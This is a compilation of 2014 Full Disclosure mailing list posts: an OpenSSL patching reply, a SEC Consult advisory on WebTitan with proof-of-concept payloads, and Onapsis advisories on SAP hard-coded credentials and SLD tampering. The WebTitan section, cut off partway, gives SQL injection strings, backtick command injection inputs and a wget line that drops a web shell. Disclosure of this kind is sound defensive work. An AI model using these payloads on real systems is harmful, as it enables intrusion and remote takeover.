Re: [FD] More OpenSSL issues
This does not appear to be the same panic level as the previous patch. In other words the previous openssl vuln was worse than the instability of all-night patching. This one is not. Take time to roll out right. On June 5, 2014 7:51:50 AM PDT, Jordan Urie wrote: >Ladies and Gentlemen, > >https://www.openssl.org/news/secadv_20140605.txt > >There's an MITM in there, and a potential for buffer over-runs. > >Patch up :-) > > >Jordan > >-- > >Jordan R. Urie > >UP Technology Consulting, Inc. >1129 - 177A St. SW >Edmonton, AB T6W 2A1 >Phone: (780) 809-0932 > >www.uptech.ca > >___ >Sent through the Full Disclosure mailing list >http://nmap.org/mailman/listinfo/fulldisclosure >Web Archives & RSS: http://seclists.org/fulldisclosure/ -- Sent from my Android phone with K-9 Mail. Please excuse my brevity. ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20140606-0 :: Multiple critical vulnerabilities in WebTitan
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140606-0 > === title: Multiple critical vulnerabilities product: WebTitan vulnerable version: 4.01 (Build 68) fixed version: 4.04 impact: critical homepage: http://www.webtitan.com found: 2014-04-07 by: Robert Giruckas, Mindaugas Liudavicius SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor description: - --- "WebTitan offers ultimate protection from internet based threats and powerful web filtering functionalities to SMBs, Service Providers and Education sectors around the World." Source: http://www.webtitan.com/about-us/webtitan Business recommendation: - Multiple critical security vulnerabilities have been identified in the WebTitan system. Exploiting these vulnerabilities potential attackers could take control over the entire system. It is highly recommended by SEC Consult not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: - --- 1) SQL Injection A SQL injection vulnerability in the /categories-x.php script allows unauthenticated remote attackers to execute arbitrary SQL commands via the "sortkey" parameter. 2) Remote command execution Multiple remote command execution vulnerabilities were detected in the WebTitan GUI. This security flaw exists due to lack of input validation. An authenticated attacker of any role (Administrator, Policy Manager, Report Manager) can execute arbitrary OS commands with the privileges of the web server. 3) Path traversal The web GUI fails to properly filter user input passed to the logfile parameter. This leads to arbitrary file download by unauthenticated attackers. 4) Unprotected Access The web GUI does not require authentication for certain PHP scripts. This security issue allows an unauthenticated remote attacker to download Webtitan configuration backup (including hashed user credentials) to the attacker's FTP server. Proof of concept: - - 1) SQL Injection The manipulation of the "sortkey" parameter allows users to modify the original SQL query. GET /categories-x.php HTTP/1.1 /categories-x.php?getcategories&sortkey=name) limit 1;-- /categories-x.php?getcategories&sortkey=name) limit 5;-- 2) Remote command execution Due to improper user input validation it is possible to inject arbitrary OS commands using backticks ``. Some of the affected files do not sanitize any type of shell metacharacters, this allows an attacker to use more flexible OS commands. Tested and working payload for most scripts: `/usr/local/bin/wget http:// -O /usr/blocker/www/graph/CPU/xshell.php` Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php, scheduledreports-x.php, reporting-x.php, network-x.php a. logs-x.php, vulnerable parameters: fname, logfile /logs-x.php?jaction=view&fname=webtitan.log;ls -la /logs-x.php POST Content: jaction=delete&logfile= b. users-x.php, vulnerable parameters: ldapserver /users-x.php?findLdapDC=1&ldapserver= c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost /support-x.php POST Content: jaction=ping&pinghost= /support-x.php POST Content: jaction=ping&dighost= /support-x.php POST Content: jaction=ping&tracehost= d. time-x.php, vulnerable parameters: ntpserversList /time-x.php POST Content: jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList= e. scheduledreports-x.php, vulnerable parameters: reportid /scheduledreports-x.php?runReport=1&reportid= f. reporting-x.php, vulnerable parameter: delegated_admin /reporting-x.php POST Content: jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10¤tpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';'&gotopage=1 g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols length), domain jaction=saveHostname&hostname=`root` jaction=saveDNS&domain=domain.com;&dnsservers=192.168.0.1-:- 3) Path traversal Due to missing input filtering in the logs-x.php script it is possible to download arbi
[FD] [Onapsis Security Advisories] Multiple Hard-coded Usernames in SAP Components
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisories:Multiple Hard-coded Usernames (CWE-798) have been found and patched in a variety of SAP components. Summaries of the advisories with links to full versions follow: 1. ONAPSIS-2014-011-SAP Project System Structures and Project-Oriented Procurement Hard-coded credentials === - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P) - -- Affected Components: * Project System * Structures * Project-Oriented Procurement (Check SAP Note 1791081 for detailed information on affected releases) - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-011 2. ONAPSIS-2014-012-SAP Brazil Specific Add-On Hard-coded Credentials = - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N) - -- Fix in SAP Note:1768049 - -- Affected Components: * Brazil Specific Add-On - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-012 3. ONAPSIS-2014-013-SAP OIL Industry Solution Traders and Schedulers Workbench Hard-coded Credentials = - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 4.6 (AV:N/AC:H/AU:S/C:P/I:P/A:P) - -- Fix in SAP Note: 1920323 - -- Affected Components: * SAP Oil Industry Solution Traders and Schedulers Workbench - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-013 4. ONAPSIS-2014-014-SAP Upgrade tools for ABAP Hard-coded credentials = - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:N/I:P/A:P) - -- Fix in SAP Note: 1915873 - -- Affected Components: * SAP Upgrade Tools - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-014 5. ONAPSIS-2014-015-SAP Web Services Tool Hard-coded Credentials - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N) - -- Fix in SAP Note: 1914777 - -- Affected Components: * SAP Web Services Tool - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-015 6. ONAPSIS-2014-016-SAP CCMS Monitoring Hard-coded Credentials == - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P) - -- Fix in SAP Note: 1911174 - -- Affected Components: * SAP CCMS Monitoring - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-016 7. ONAPSIS-2014-017-SAP Transaction Data Pool Hard-coded Credentials - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P) - -- Fix in SAP Note: 1795463 - -- Affected Components: * SAP Transaction Data Pool - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-017 8. ONAPSIS-2014-018-SAP Capacity Leveling Hard-coded Credentials - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P) - -- Fix in SAP Note: 1789569 - -- Affected Components: * SAP Capacity Leveling - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-018 9. ONAPSIS-2014-019-SAP Open Hub Service Hard-coded Credentials === - -- Public Release Date: 2014-06-06 - -- Researcher: Sergio Abraham - -- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:P/I:P/A:N) - -- Fix in SAP Note: 1738965 - -- Affected Components: * SAP Open Hub Service - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-019 - -- Ezequiel Gutesman Director Of Research Onapsis -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlOR3d4ACgkQz3i6WNVBcDVZ/gCfVFecGvz69JcNRk7WnK/RZ0Gd sxgAn3MmMOBrquYu//VJdeUiP9SR/wWC =sxVQ -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2014-020: SAP SLD Information Tampering 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to modify technical information about the SAP systems potentially leading to a full compromise of all business information. Risk Level: High 2. Advisory Information === - -- Public Release Date: 2014-06-06 - -- Subscriber Notification Date: 2014-06-06 - -- Last Revised: 2014-06-06 - -- Security Advisory ID: ONAPSIS-2014-020 - -- Onapsis SVS ID: ONAPSIS-SVS00081 - -- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen - -- Initial Base CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 3. Vulnerability Information - -- Vendor: SAP - -- Affected Components: * SAP System Landscape Directory (available in all SAP JAVA App Servers) (Check SAP Note 1939334 for detailed information on affected releases) - -- Vulnerability Class: Improper Handling of Insufficient Permissions or Privileges (CWE-280) - -- Remotely Exploitable: Yes - -- Locally Exploitable: No - -- Authentication Required: No - -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020 4. Affected Components Description == According to the vendor, ?The System Landscape Directory (SLD) of SAP NetWeaver is the central source of system landscape information relevant for the management of your software life-cycle?[1]. 5. Vulnerability Details The SLD is a central repository of technical and SAP systems-related information. The mechanism used to add new systems to the SLD is not properly secured by default, meaning that a remote unauthenticated attacker could interact with the SLD and because of its architectural design, it could lead to a full SAP SLD system compromise. Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === SAP has released SAP Note 1939334 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1939334. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2013-09-12: Vulnerability reported to SAP. 2013-09-13: SAP confirms having the information of vulnerability. 2014-02-11: SAP releases security patches. 2014-05-30: Onapsis notifies availability of security advisory to security mailing lists. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats. Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform. Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security experts who are continuously invited to lecture at the leading IT security conferences, such as RSA and BlackHat, and featured by mainstream media such as CNN, Reuters, IDG and New York Times. For further information about our solutions, please contact us at i...@onapsis.com and visit our website at www.onapsis.com. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlOR3fUACgkQz3i6WNVBcDWrjwCdFC60a5sqq2hol1xAYYt0NczH fZwAn0St6TPuqLg210wpu2LM+bTDNY2S =2YwW -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
